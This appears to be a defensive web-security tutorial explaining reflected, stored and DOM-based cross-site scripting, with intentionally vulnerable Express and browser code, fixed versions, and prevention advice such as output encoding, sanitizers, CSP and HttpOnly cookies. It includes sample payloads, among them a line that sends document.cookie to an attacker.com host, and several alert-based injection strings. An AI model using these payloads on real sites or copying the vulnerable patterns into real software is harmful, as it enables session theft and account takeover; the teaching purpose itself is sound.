Cross-site scripting is one of those vulnerabilities that keeps showing up because it’s fundamentally simple: untrusted data ends up in a place where the browser treats it as code. But “XSS” isn’t just one thing. In practice, you’ll usually hear about three flavors:
- Reflected XSS
- Stored XSS
- DOM-based XSS
They all end with attacker-controlled JavaScript running in a victim’s browser, but the way the payload gets there matters a lot for both exploitation and prevention.
If you’re trying to secure a real app, understanding the difference is not optional. Teams often say “we escape output” and still miss DOM sinks. Or they deploy a WAF and assume reflected XSS is solved while stored XSS sits in a comment field for months.
This tutorial walks through each type, shows how it happens, and explains what actually fixes it.
The core idea behind all XSS
At a high level, XSS happens when:
- An attacker controls some input.
- That input reaches a browser-executable context.
- The browser interprets it as HTML or JavaScript instead of plain text.
A tiny example says it best. Suppose your app takes a name from the user and renders it directly:
<div>Welcome, {{name}}</div>
If your templating system safely escapes the value, the browser sees text. Good.
But if the app instead outputs raw HTML:
<div>Welcome, <script>alert(1)</script></div>
the browser executes the script. That’s XSS.
The three categories differ in where the malicious input comes from and how it reaches the page.
Reflected XSS
Reflected XSS happens when attacker input is sent in a request and immediately reflected in the response without proper escaping or validation.
This is the classic “click this malicious link” version of XSS.
How it works
Imagine a search page:
GET /search?q=shoes
The server responds with:
<h1>Search results for: shoes</h1>
If the server builds that HTML unsafely, an attacker can craft a URL like:
https://example.com/search?q=<script>alert(1)</script>
If the server inserts q directly into the page, the victim’s browser runs the script when they visit the link.
Vulnerable server example
Here’s a deliberately bad Node/Express example:
app.get('/search', (req, res) => {
  const q = req.query.q || '';
  res.send(`<h1>Search results for: ${q}</h1>`);
});
Attack payload:
/search?q=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>
If cookies aren’t protected with HttpOnly, that’s game over for session theft.
Safer version
The right fix is context-aware escaping. If you are inserting untrusted data into HTML text content, escape it for HTML.
function escapeHtml(str) {
  return str
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

app.get('/search', (req, res) => {
  const q = req.query.q || '';
  res.send(`<h1>Search results for: ${escapeHtml(q)}</h1>`);
});
Now <script>alert(1)</script> is rendered as text, not executed.
Why reflected XSS is dangerous
People sometimes downplay reflected XSS because it “requires a victim to click a link.” That’s a mistake.
Attackers can deliver payloads through:
- phishing emails
- shortened URLs
- malicious ads
- open redirects
- injected links in trusted forums or chat systems
And reflected XSS often lands on high-value pages like login forms, admin search panels, support dashboards, or payment flows.
Common reflected XSS sinks
You’ll often find reflected XSS when input is inserted into:
- HTML body content
- HTML attributes
- inline JavaScript
- script blocks
- URL attributes like href and src
This matters because escaping rules differ by context. HTML escaping alone does not make inline JavaScript safe.
For example, this is still dangerous:
res.send(`<script>var q = '${req.query.q}'</script>`);
If q contains:
';alert(1);//
the resulting script becomes:
<script>var q = '';alert(1);//'</script>
That’s why “just escape some characters” is not a serious XSS strategy.
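If you genuinely must embed untrusted data in an inline script, serialize it for the JavaScript context instead of HTML-escaping it. A minimal sketch (toJsLiteral is an illustrative helper, not a standard API):

```javascript
// Serialize untrusted input for a JavaScript string context.
// JSON.stringify escapes quotes and backslashes; replacing "<"
// stops a "</script>" payload from closing the script block early.
function toJsLiteral(value) {
  return JSON.stringify(String(value)).replace(/</g, '\\u003c');
}

// Both the quote breakout and the closing-tag trick are neutralized:
const q = "';alert(1);//";
const html = `<script>var q = ${toJsLiteral(q)};</script>`;
```

The payload stays inside a double-quoted string literal and never terminates the script element.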
Stored XSS
Stored XSS happens when attacker input is saved by the application and later served to users. This is usually worse than reflected XSS because the payload persists and can hit many victims automatically.
This is the “plant a payload and wait” version.
How it works
Think about a comment system. A user posts:
<script>alert('pwned')</script>
The app stores the comment in the database. Whenever anyone views the page, the comment is rendered and the script executes.
Unlike reflected XSS, the victim does not need a special link. They just browse to a normal page containing stored attacker content.
Vulnerable example
A basic Express app:
const comments = [];

app.post('/comment', (req, res) => {
  comments.push(req.body.text);
  res.send('Saved');
});

app.get('/comments', (req, res) => {
  const html = comments.map(c => `<li>${c}</li>`).join('');
  res.send(`<ul>${html}</ul>`);
});
If an attacker submits:
<img src=x onerror=alert('stored-xss')>
that gets stored and triggers when rendered.
Safer version
Escape when rendering:
app.get('/comments', (req, res) => {
  const html = comments.map(c => `<li>${escapeHtml(c)}</li>`).join('');
  res.send(`<ul>${html}</ul>`);
});
If your app genuinely supports rich text, don’t roll your own sanitizer. Use a well-maintained HTML sanitizer with a strict allowlist.
For example, allow:
- <b>, <i>, <p>, <a> with a safe href
And strip:
- <script> tags
- event handlers like onclick
- dangerous URLs like javascript:...
- inline styles, if you can avoid them
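With a maintained library such as DOMPurify, that policy becomes configuration rather than custom parsing code. A browser-side sketch (assumes DOMPurify is loaded on the page; tag and attribute names match the allowlist above):

```javascript
// DOMPurify applies the allowlist and also strips javascript: URLs
// and event handler attributes by default.
const clean = DOMPurify.sanitize(userHtml, {
  ALLOWED_TAGS: ['b', 'i', 'p', 'a'],
  ALLOWED_ATTR: ['href'],
});
container.innerHTML = clean; // acceptable only because it was sanitized first
```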
Why stored XSS is usually worse
Stored XSS tends to have broader impact because:
- it affects every viewer of the infected content
- it can target admins and moderators
- it persists until removed
- it’s easier to weaponize for account takeover or internal pivoting
If an attacker can inject stored XSS into an admin panel, they may be able to trigger privileged actions through the admin’s session, read sensitive data shown in the UI, or create new privileged users.
Stored XSS is especially common in:
- comments
- profile fields
- support tickets
- CMS content
- product reviews
- chat messages
- forum posts
- logs displayed in admin dashboards
And yes, log viewers are a real problem. People forget that log entries can contain user-controlled strings.
DOM-based XSS
DOM-based XSS is different because the vulnerability lives in client-side JavaScript rather than in server-rendered HTML. The server might return a perfectly safe page, but frontend code reads attacker-controlled data and writes it into a dangerous DOM sink.
This is where a lot of modern apps still get burned.
How it works
Suppose the frontend reads a value from the URL fragment:
https://example.com/#<img src=x onerror=alert(1)>
And then does this:
const payload = location.hash.substring(1);
document.getElementById('output').innerHTML = payload;
That’s DOM XSS. The browser never sent the fragment to the server. The page’s own JavaScript turned untrusted input into executable HTML.
Vulnerable example
<div id="message"></div>
<script>
const msg = new URLSearchParams(window.location.search).get('msg');
document.getElementById('message').innerHTML = msg;
</script>
Payload:
?msg=<svg onload=alert('dom-xss')>
The script grabs msg and injects it with innerHTML, and the browser executes it.
Safer version
Use safe DOM APIs that treat content as text:
<div id="message"></div>
<script>
const msg = new URLSearchParams(window.location.search).get('msg') || '';
document.getElementById('message').textContent = msg;
</script>
Now the payload is displayed literally.
Dangerous DOM sinks
If you work on frontend code, these APIs should immediately make you suspicious:
- innerHTML
- outerHTML
- insertAdjacentHTML
- document.write
- eval
- setTimeout(string)
- setInterval(string)
- new Function(...)
Also watch assignments to:
- element.srcdoc
- location
- iframe.src and script.src when attacker-controlled
- event handler attributes like onclick
And don’t assume React, Vue, Angular, or Svelte automatically save you from everything. Framework defaults help a lot, but escape hatches like React’s dangerouslySetInnerHTML exist for a reason: they are dangerous.
Quick comparison
Here’s the practical difference:
Reflected XSS
- Payload comes from the current request
- Usually requires tricking a victim into visiting a crafted URL
- Server reflects the input in the response
Stored XSS
- Payload is saved on the server or backend storage
- Victims are hit when viewing infected content
- Usually broader and more persistent impact
DOM-based XSS
- Payload is processed by client-side JavaScript
- Server response may be static and innocent
- Vulnerability depends on unsafe DOM manipulation
Real-world source to sink thinking
The most useful way to think about XSS isn’t by memorizing names. It’s by tracing data flow:
Sources
Where attacker input comes from:
- query parameters
- POST bodies
- headers
- URL fragments
- document.referrer
- localStorage
- postMessage
- database content
- third-party APIs
Sinks
Where it becomes dangerous:
- HTML injection points
- script execution contexts
- JavaScript-evaluating functions
- URL-based execution paths
- event handler attributes
If untrusted data can move from a source to a sink without proper handling, you likely have XSS.
Prevention that actually works
A lot of XSS advice online is half-true. Here’s the version that matters.
1. Use context-aware output encoding
Escape based on where the data goes:
- HTML text: HTML escape
- HTML attribute: attribute escape
- JavaScript string: JavaScript-safe serialization
- URL: URL encode
- CSS: ideally don’t inject untrusted data there at all
One encoder does not fit every context.
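A sketch of what "different encoder per context" looks like in practice (function names are illustrative, not from a specific library):

```javascript
// HTML text and quoted-attribute context: escape the five significant chars.
function encodeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
  }[c]));
}

// URL query component: use the platform's encoder, not a hand-rolled regex.
function encodeQueryParam(s) {
  return encodeURIComponent(String(s));
}

// Same input, different safe forms depending on the destination:
const input = '<script>';
const asText = `<p>${encodeHtml(input)}</p>`;         // &lt;script&gt;
const asUrl = `/search?q=${encodeQueryParam(input)}`; // %3Cscript%3E
```

Applying the HTML encoder to the URL context, or vice versa, would leave one of the two outputs exploitable.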
2. Prefer safe DOM APIs
Use:
- textContent
- setAttribute with validated values
- createTextNode
- appendChild
Avoid raw HTML injection unless absolutely necessary.
3. Sanitize rich HTML with a real sanitizer
If users can submit formatted content, sanitize with a battle-tested library and a strict allowlist. Do not try to blacklist “bad tags.” That approach fails constantly.
4. Deploy Content Security Policy
CSP is not a replacement for fixing XSS, but it’s an excellent mitigation layer.
A strong CSP can reduce exploitability by blocking inline scripts and restricting where scripts load from.
A decent starting point looks like:
Content-Security-Policy:
default-src 'self';
script-src 'self' 'nonce-random123';
object-src 'none';
base-uri 'self';
frame-ancestors 'none';
Nonces or hashes are much better than allowing 'unsafe-inline'. If your CSP includes 'unsafe-inline', you’ve already weakened it significantly.
5. Set cookie defenses
Use:
Set-Cookie: session=...; HttpOnly; Secure; SameSite=Lax
HttpOnly helps prevent JavaScript from reading cookies, which limits one common XSS impact. It does not stop XSS itself.
6. Avoid inline JavaScript
This pattern is fragile:
<button onclick="doSearch('USER_INPUT')">Go</button>
Use event listeners in separate JS instead.
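The same behavior with the handler attached from a separate script, so user data is never spliced into markup (element ids are illustrative):

```javascript
// search.js - loaded via <script src="search.js" defer></script>
document.getElementById('search-btn').addEventListener('click', () => {
  const q = document.getElementById('search-input').value;
  doSearch(q); // q is passed as a plain value, never concatenated into HTML
});
```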
7. Validate URLs before inserting them
If you let users control links or redirect targets, validate scheme and destination. Reject dangerous schemes like:
- javascript:
- data:
- vbscript:
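A sketch using the WHATWG URL parser (a global in both Node and browsers); safeHref is an illustrative helper that falls back to a harmless value:

```javascript
// Allow only http(s) and relative URLs; reject javascript:, data:,
// vbscript:, and anything the parser cannot make sense of.
function safeHref(userUrl) {
  try {
    // The base only matters for resolving relative inputs.
    const { protocol } = new URL(String(userUrl), 'https://example.com');
    if (protocol === 'http:' || protocol === 'https:') return String(userUrl);
  } catch (err) {
    // Unparsable input falls through to the safe default.
  }
  return '#';
}
```

Checking the parsed protocol, rather than string-matching the prefix, also catches tricks like mixed case ("JaVaScRiPt:").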
A common misconception: “We escaped on input”
Don’t rely on input-time escaping as your main defense.
Why? Because the same data may later be used in different contexts:
- shown in HTML
- embedded in JavaScript
- inserted into an attribute
- exported as JSON
Encoding should usually happen at output, for the specific context being rendered. Validation on input is good for enforcing business rules, but it’s not a universal XSS fix.
Testing for each type
A simple mental checklist:
For reflected XSS
Put payloads in:
- query params
- form fields
- headers
Then see whether they come back in the response unsafely.
For stored XSS
Submit payloads into:
- comments
- names
- messages
- ticket fields
- profile fields
Then revisit pages that display the stored data, especially admin views.
For DOM XSS
Inspect frontend code for:
- innerHTML
- URL parsing
- location.hash
- postMessage
- template rendering from client-side data
Then test if browser-only input can trigger execution without the server reflecting it.
Final takeaway
If you remember one thing, make it this:
- Reflected XSS: payload comes in the request and bounces off the server response.
- Stored XSS: payload gets saved and hits users later.
- DOM-based XSS: frontend JavaScript turns untrusted data into code in the browser.
They’re different delivery mechanisms for the same underlying failure: treating attacker-controlled input as executable content.
The fix is also the same in spirit: never let untrusted data reach dangerous browser contexts without the right protections. Escape for the right context, sanitize when HTML is allowed, use safe DOM APIs, and back it up with CSP.
If your app mixes server rendering, user-generated content, and client-side DOM updates, assume all three XSS types are relevant. Because they usually are.